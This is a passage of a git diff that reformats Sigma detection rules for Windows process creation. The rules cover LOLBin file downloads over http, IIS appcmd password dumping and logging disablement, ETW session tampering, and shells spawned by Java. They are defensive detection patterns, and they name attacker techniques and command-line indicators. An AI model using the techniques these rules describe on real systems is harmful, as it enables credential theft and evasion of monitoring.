- https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/
author: frack113
@@ -18,10 +17,10 @@ detection:
EventID: 4688
Channel: Security
selection_icacls:
- - OriginalFileName: iCACLS.EXE
- - NewProcessName|endswith: \icacls.exe
- selection_cmd:
- CommandLine|contains|all:
+ - OriginalFileName: iCACLS.EXE
+ - NewProcessName|endswith: \icacls.exe
+ selection_cmd: # icacls "C:\Users\admin\AppData\Local\37f92fe8-bcf0-4ee0-b8ba-561f797f5696" /deny *S-1-1-0:(OI)(CI)(DE,DC)
+ CommandLine|contains|all:
- C:\Users\
- /deny
- '*S-1-1-0:'
diff --git a/sigma/builtin/process_creation/proc_creation_win_ieexec_download.yml b/sigma/builtin/process_creation/proc_creation_win_ieexec_download.yml
index 5e21959f6..fedf52cd7 100644
--- a/sigma/builtin/process_creation/proc_creation_win_ieexec_download.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_ieexec_download.yml
@@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \IEExec.exe - - OriginalFileName: IEExec.exe + - NewProcessName|endswith: \IEExec.exe + - OriginalFileName: IEExec.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_http_logging.yml b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_http_logging.yml index 34f015f29..39515c67a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_http_logging.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_http_logging.yml @@ -1,8 +1,7 @@ title: Disable Windows IIS HTTP Logging id: e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e status: test -description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group - 3390 (Bronze Union) +description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging author: frack113 @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - NewProcessName|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - set - config - section:httplogging diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml index 51a15977c..153ffb829 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml @@ -1,8 +1,7 @@ title: Microsoft IIS Service Account Password Dumped id: 2d3cdeec-c0db-45b4-aa86-082f7eb75701 status: test -description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, - being used to list passwords +description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords references: - https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html - https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA @@ -21,30 +20,31 @@ detection: EventID: 4688 Channel: Security selection_base_name: - - NewProcessName|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - NewProcessName|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_base_list: - CommandLine|contains: 'list ' + CommandLine|contains: 'list ' selection_standalone: - CommandLine|contains: - - ' /config' + CommandLine|contains: + - ' /config' # https://pbs.twimg.com/media/FgydDAJWIAEio34?format=png&name=900x900 - ' /xml' + # We cover the "-" version just in case :) - ' -config' - ' -xml' selection_cmd_flags: - CommandLine|contains: - - ' /@t' + CommandLine|contains: + - ' /@t' # Covers both "/@text:*" and "/@t:*" - ' /text' - ' /show' + # We cover the "-" version just in case :) - ' -@t' - ' -text' - ' -show' selection_cmd_grep: - CommandLine|contains: + CommandLine|contains: - :\* - password - condition: process_creation and (all of selection_base_* and (selection_standalone - or all of selection_cmd_*)) + condition: process_creation and (all of selection_base_* and (selection_standalone or all of selection_cmd_*)) falsepositives: - Unknown level: high 
diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml index 35d010942..10582f8bb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml @@ -19,20 +19,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - NewProcessName|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - install - module - CommandLine|contains: + CommandLine|contains: - '/name:' - '-name:' filter_iis_setup: ParentProcessName: C:\Windows\System32\inetsrv\iissetup.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Unknown as it may vary from organisation to organisation how admins use to install - IIS modules + - Unknown as it may vary from organisation to organisation how admins use to install IIS modules level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml index eb842a0f4..6959d3958 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml 
@@ -1,9 +1,7 @@ title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd id: 7c8af9b2-dcae-41a2-a9db-b28c288b5f08 status: test -description: Detects usage of "appcmd" to create new global URL rewrite rules. This - behaviour has been observed being used by threat actors to add new rules so they - can access their webshells. +description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. references: - https://twitter.com/malmoeb/status/1616702107242971144 - https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r @@ -19,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - NewProcessName|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - set - config - section:system.webServer/rewrite/globalRules diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_connection_strings_decryption.yml b/sigma/builtin/process_creation/proc_creation_win_iis_connection_strings_decryption.yml index 8366c3fa8..12e14a70d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_connection_strings_decryption.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_connection_strings_decryption.yml 
@@ -1,10 +1,7 @@ title: Microsoft IIS Connection Strings Decryption id: 97dbf6e2-e436-44d8-abee-4261b24d3e41 status: test -description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. - An attacker with Microsoft IIS web server access via a webshell or alike can decrypt - and dump any hardcoded connection strings, such as the MSSQL service account password - using aspnet_regiis command. +description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. references: - https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html author: Tim Rauch @@ -21,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_name: - - NewProcessName|endswith: \aspnet_regiis.exe - - OriginalFileName: aspnet_regiis.exe + - NewProcessName|endswith: \aspnet_regiis.exe + - OriginalFileName: aspnet_regiis.exe selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - connectionStrings - ' -pdf' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_iis_susp_module_registration.yml b/sigma/builtin/process_creation/proc_creation_win_iis_susp_module_registration.yml index 6e43d3e72..21c657cbd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_iis_susp_module_registration.yml +++ b/sigma/builtin/process_creation/proc_creation_win_iis_susp_module_registration.yml 
@@ -1,8 +1,7 @@ title: Suspicious IIS Module Registration id: 043c4b8b-3a54-4780-9682-081cb6b8185c status: test -description: Detects a suspicious IIS module registration as described in Microsoft - threat report on IIS backdoors +description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors references: - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ author: Florian Roth (Nextron Systems), Microsoft (idea) @@ -21,12 +20,12 @@ detection: selection_parent: ParentProcessName|endswith: \w3wp.exe selection_cli_1: - CommandLine|contains: appcmd.exe add module + CommandLine|contains: appcmd.exe add module selection_cli_2: - CommandLine|contains: ' system.enterpriseservices.internal.publish' - NewProcessName|endswith: \powershell.exe + CommandLine|contains: ' system.enterpriseservices.internal.publish' + NewProcessName|endswith: \powershell.exe selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - gacutil - ' /I' condition: process_creation and (selection_parent and 1 of selection_cli_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml b/sigma/builtin/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml index ddc42411d..a9929560a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml +++ b/sigma/builtin/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml 
@@ -1,8 +1,7 @@ title: ImagingDevices Unusual Parent/Child Processes id: f11f2808-adb4-46c0-802a-8660db50fa99 status: test -description: Detects unusual parent or children of the ImagingDevices.exe (Windows - Contacts) process as seen being used with Bumblebee activity +description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +19,13 @@ detection: Channel: Security selection_parent: ParentProcessName|endswith: + # Add more if known - \WmiPrvSE.exe - \svchost.exe - \dllhost.exe - NewProcessName|endswith: \ImagingDevices.exe + NewProcessName|endswith: \ImagingDevices.exe selection_child: + # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy ParentProcessName|endswith: \ImagingDevices.exe condition: process_creation and (1 of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_imewbdld_download.yml b/sigma/builtin/process_creation/proc_creation_win_imewbdld_download.yml index 9664b4e08..075b085c0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_imewbdld_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_imewbdld_download.yml @@ -1,8 +1,8 @@ title: Arbitrary File Download Via IMEWDBLD.EXE id: 863218bd-c7d0-4c52-80cd-0a96c09f54af related: - - id: 8d7e392e-9b28-49e1-831d-5949c6281228 - type: derived + - id: 8d7e392e-9b28-49e1-831d-5949c6281228 + type: derived status: experimental description: Detects usage of "IMEWDBLD.exe" to download arbitrary files references: 
@@ -22,14 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \IMEWDBLD.exe - - OriginalFileName: imewdbld.exe + - NewProcessName|endswith: \IMEWDBLD.exe + - OriginalFileName: imewdbld.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) falsepositives: - Unknown +# Note: Please reduce this to medium if you find legitimate use case of this utility with a URL level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml b/sigma/builtin/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml index 7da96d7f2..2f517d6c5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml +++ b/sigma/builtin/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml @@ -1,8 +1,7 @@ title: InfDefaultInstall.exe .inf Execution id: ce7cf472-6fcc-490a-9481-3786840b5d9b status: test -description: Executes SCT script using scrobj.dll from a command in entered into a - specially prepared INF file. +description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution - https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/ @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'InfDefaultInstall.exe ' - '.inf' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_installutil_download.yml b/sigma/builtin/process_creation/proc_creation_win_installutil_download.yml index 72751bf79..0c1baa8ed 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_installutil_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_installutil_download.yml @@ -1,10 +1,8 @@ title: File Download Via InstallUtil.EXE id: 75edd216-1939-4c73-8d61-7f3a0d85b5cc status: test -description: 'Detects use of .NET InstallUtil.exe in order to download arbitrary files. - The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" - - ' +description: | + Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \InstallUtil.exe - - OriginalFileName: InstallUtil.exe + - NewProcessName|endswith: \InstallUtil.exe + - OriginalFileName: InstallUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/builtin/process_creation/proc_creation_win_instalutil_no_log_execution.yml b/sigma/builtin/process_creation/proc_creation_win_instalutil_no_log_execution.yml index 5dc2c577a..cf6d46376 100644 --- a/sigma/builtin/process_creation/proc_creation_win_instalutil_no_log_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_instalutil_no_log_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Execution of InstallUtil Without Log id: d042284c-a296-4988-9be5-f424fadcc28c status: test -description: Uses the .NET InstallUtil.exe application in order to execute image without - log +description: Uses the .NET InstallUtil.exe application in order to execute image without log references: - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/ - https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool 
@@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '/logfile= ' - /LogToConsole=false - NewProcessName|endswith: \InstallUtil.exe - NewProcessName|contains: Microsoft.NET\Framework + NewProcessName|endswith: \InstallUtil.exe + NewProcessName|contains: Microsoft.NET\Framework condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_java_keytool_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_java_keytool_susp_child_process.yml index b6ac19258..0480f2d1f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_java_keytool_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_java_keytool_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Shells Spawn by Java Utility Keytool id: 90fb5e62-ca1f-4e22-b42e-cc521874c938 status: test -description: Detects suspicious shell spawn from Java utility keytool process (e.g. - adselfservice plus exploitation) +description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) references: - https://redcanary.com/blog/intelligence-insights-december-2021 - https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html @@ -22,7 +21,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \keytool.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \sh.exe - \bash.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml index 692b029f2..222f8ebc9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml 
@@ -1,8 +1,7 @@ title: Suspicious Child Process Of Manage Engine ServiceDesk id: cea2b7ea-792b-405f-95a1-b903ea06458f status: experimental -description: Detects suspicious child processes of the "Manage Engine ServiceDesk - Plus" Java web service +description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service references: - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ - https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py @@ -24,7 +23,7 @@ detection: ParentProcessName|contains|all: - \ManageEngine\ServiceDesk\ - \java.exe - NewProcessName|endswith: + NewProcessName|endswith: - \AppVLP.exe - \bash.exe - \bitsadmin.exe @@ -37,7 +36,7 @@ detection: - \mshta.exe - \net.exe - \net1.exe - - \notepad.exe + - \notepad.exe # Often used in POCs - \powershell.exe - \pwsh.exe - \query.exe @@ -46,12 +45,16 @@ detection: - \scrcons.exe - \sh.exe - \systeminfo.exe - - \whoami.exe + - \whoami.exe # Often used in POCs - \wmic.exe - \wscript.exe + # - '\hh.exe' + # - '\regsvr32.exe' + # - '\rundll32.exe' + # - '\scriptrunner.exe' filter_main_net: - CommandLine|contains: ' stop' - NewProcessName|endswith: + CommandLine|contains: ' stop' + NewProcessName|endswith: - \net.exe - \net1.exe condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_java_remote_debugging.yml b/sigma/builtin/process_creation/proc_creation_win_java_remote_debugging.yml index 15a339ab0..32cef0f15 100644 --- a/sigma/builtin/process_creation/proc_creation_win_java_remote_debugging.yml +++ b/sigma/builtin/process_creation/proc_creation_win_java_remote_debugging.yml 
@@ -1,8 +1,7 @@ title: Java Running with Remote Debugging id: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710 status: test -description: Detects a JAVA process running with remote debugging allowing more than - just localhost to connect +description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect references: - https://dzone.com/articles/remote-debugging-java-applications-with-jdwp author: Florian Roth (Nextron Systems) @@ -19,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection_jdwp_transport: - CommandLine|contains: transport=dt_socket,address= + CommandLine|contains: transport=dt_socket,address= selection_old_jvm_version: - CommandLine|contains: + CommandLine|contains: - jre1. - jdk1. exclusion: - CommandLine|contains: + CommandLine|contains: - address=127.0.0.1 - address=localhost condition: process_creation and (all of selection_* and not exclusion) diff --git a/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process.yml index 60ca5234c..b4e14aa20 100644 --- a/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Processes Spawned by Java.EXE id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d related: - - id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 - type: similar + - id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 + type: similar status: experimental -description: Detects suspicious processes spawned from a Java host process which could - indicate a sign of exploitation (e.g. log4j) +description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) author: Andreas Hunkeler (@Karneades), Florian Roth date: 2021/12/17 modified: 2023/11/09 
@@ -22,7 +21,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \java.exe - NewProcessName|endswith: + NewProcessName|endswith: - \AppVLP.exe - \bash.exe - \bitsadmin.exe @@ -45,7 +44,7 @@ detection: - \sh.exe - \systeminfo.exe - \whoami.exe - - \wmic.exe + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \wscript.exe condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process_2.yml b/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process_2.yml index 86cd41a23..d3bc4a88e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process_2.yml +++ b/sigma/builtin/process_creation/proc_creation_win_java_susp_child_process_2.yml @@ -1,11 +1,10 @@ title: Shell Process Spawned by Java.EXE id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 related: - - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d - type: similar + - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d + type: similar status: test -description: Detects shell spawned from Java host process, which could be a sign of - exploitation (e.g. log4j exploitation) +description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali date: 2021/12/17 modified: 2023/11/09 @@ -22,12 +21,12 @@ detection: Channel: Security selection: ParentProcessName|endswith: \java.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe filter_main_build: - CommandLine|contains: build + CommandLine|contains: build # excluding CI build agents ParentProcessName|contains: build condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: 
diff --git a/sigma/builtin/process_creation/proc_creation_win_kd_execution.yml b/sigma/builtin/process_creation/proc_creation_win_kd_execution.yml index 6d243142d..5e9749011 100644 --- a/sigma/builtin/process_creation/proc_creation_win_kd_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_kd_execution.yml @@ -17,11 +17,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \kd.exe - - OriginalFileName: kd.exe + - NewProcessName|endswith: \kd.exe + - OriginalFileName: kd.exe condition: process_creation and selection falsepositives: - - Rare occasions of legitimate cases where kernel debugging is necessary in production. - Investigation is required + - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_computer.yml b/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_computer.yml index 680c910a8..4110fff4d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_computer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_computer.yml @@ -1,8 +1,7 @@ title: Computer Password Change Via Ksetup.EXE id: de16d92c-c446-4d53-8938-10aeef41c8b6 status: experimental -description: Detects password change for the computer's domain account or host principal - via "ksetup.exe" +description: Detects password change for the computer's domain account or host principal via "ksetup.exe" references: - https://twitter.com/Oddvarmoe/status/1641712700605513729 - https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup 
@@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ksetup.exe - - OriginalFileName: ksetup.exe + - NewProcessName|endswith: \ksetup.exe + - OriginalFileName: ksetup.exe selection_cli: - CommandLine|contains: ' /setcomputerpassword ' + CommandLine|contains: ' /setcomputerpassword ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_user.yml b/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_user.yml index 0dce70925..1740b4f02 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_user.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ksetup_password_change_user.yml @@ -16,10 +16,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ksetup.exe - - OriginalFileName: ksetup.exe + - NewProcessName|endswith: \ksetup.exe + - OriginalFileName: ksetup.exe selection_cli: - CommandLine|contains: ' /ChangePassword ' + CommandLine|contains: ' /ChangePassword ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_ldifde_export.yml b/sigma/builtin/process_creation/proc_creation_win_ldifde_export.yml index 6306ea5ff..78b4dd6b8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ldifde_export.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ldifde_export.yml 
@@ -1,8 +1,7 @@ title: Active Directory Structure Export Via Ldifde.EXE id: 4f7a6757-ff79-46db-9687-66501a02d9ec status: experimental -description: Detects the execution of "ldifde.exe" in order to export organizational - Active Directory structure. +description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. references: - https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_ldif: - - NewProcessName|endswith: \ldifde.exe - - OriginalFileName: ldifde.exe + - NewProcessName|endswith: \ldifde.exe + - OriginalFileName: ldifde.exe selection_cmd: - CommandLine|contains: -f + CommandLine|contains: -f filter_import: - CommandLine|contains: ' -i' + CommandLine|contains: ' -i' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_ldifde_file_load.yml b/sigma/builtin/process_creation/proc_creation_win_ldifde_file_load.yml index 76e42356d..dbc02555f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ldifde_file_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ldifde_file_load.yml 
@@ -1,11 +1,8 @@ title: Import LDAP Data Interchange Format File Via Ldifde.EXE id: 6f535e01-ca1f-40be-ab8d-45b19c0c8b7f status: experimental -description: 'Detects the execution of "Ldifde.exe" with the import flag "-i". The - can be abused to include HTTP-based arguments which will allow the arbitrary download - of files from a remote server. - - ' +description: | + Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. references: - https://twitter.com/0gtweet/status/1564968845726580736 - https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html @@ -26,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ldifde.exe - - OriginalFileName: ldifde.exe + - NewProcessName|endswith: \ldifde.exe + - OriginalFileName: ldifde.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - -i - -f condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml b/sigma/builtin/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml index bbb2beb56..33ba79366 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml 
@@ -1,10 +1,7 @@ title: Rebuild Performance Counter Values Via Lodctr.EXE id: cc9d3712-6310-4320-b2df-7cb408274d53 status: experimental -description: Detects the execution of "lodctr.exe" to rebuild the performance counter - registry values. This can be abused by attackers by providing a malicious config - file to overwrite performance counter configuration to confuse and evade monitoring - and security solutions. +description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. references: - https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr author: Nasreddine Bencherchali (Nextron Systems) @@ -20,9 +17,9 @@ detection: Channel: Security selection_img: OriginalFileName: LODCTR.EXE - NewProcessName|endswith: \lodctr.exe + NewProcessName|endswith: \lodctr.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /r' - ' -r' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_logman_disable_eventlog.yml b/sigma/builtin/process_creation/proc_creation_win_logman_disable_eventlog.yml index e1690ff1a..6a7924da3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_logman_disable_eventlog.yml +++ b/sigma/builtin/process_creation/proc_creation_win_logman_disable_eventlog.yml 
@@ -1,8 +1,7 @@ title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE id: cd1f961e-0b96-436b-b7c6-38da4583ec00 status: test -description: Detects the execution of "logman" utility in order to disable or delete - Windows trace sessions +description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions references: - https://twitter.com/0gtweet/status/1359039665232306183?s=21 - https://ss64.com/nt/logman.html @@ -21,16 +20,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \logman.exe - - OriginalFileName: Logman.exe + - NewProcessName|endswith: \logman.exe + - OriginalFileName: Logman.exe selection_action: - CommandLine|contains: + CommandLine|contains: - 'stop ' - 'delete ' selection_service: - CommandLine|contains: + CommandLine|contains: - Circular Kernel Context Logger - - EventLog- + - EventLog- # Cover multiple traces starting with EventLog-* - SYSMON TRACE - SysmonDnsEtwSession condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_cdb.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_cdb.yml index 166cb9ccb..0fca95eee 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_cdb.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_cdb.yml @@ -1,8 +1,7 @@ title: WinDbg/CDB LOLBIN Usage id: b5c7395f-e501-4a08-94d4-57fe7a9da9d2 status: test -description: Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes - or commands from a debugger script file +description: Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/ - 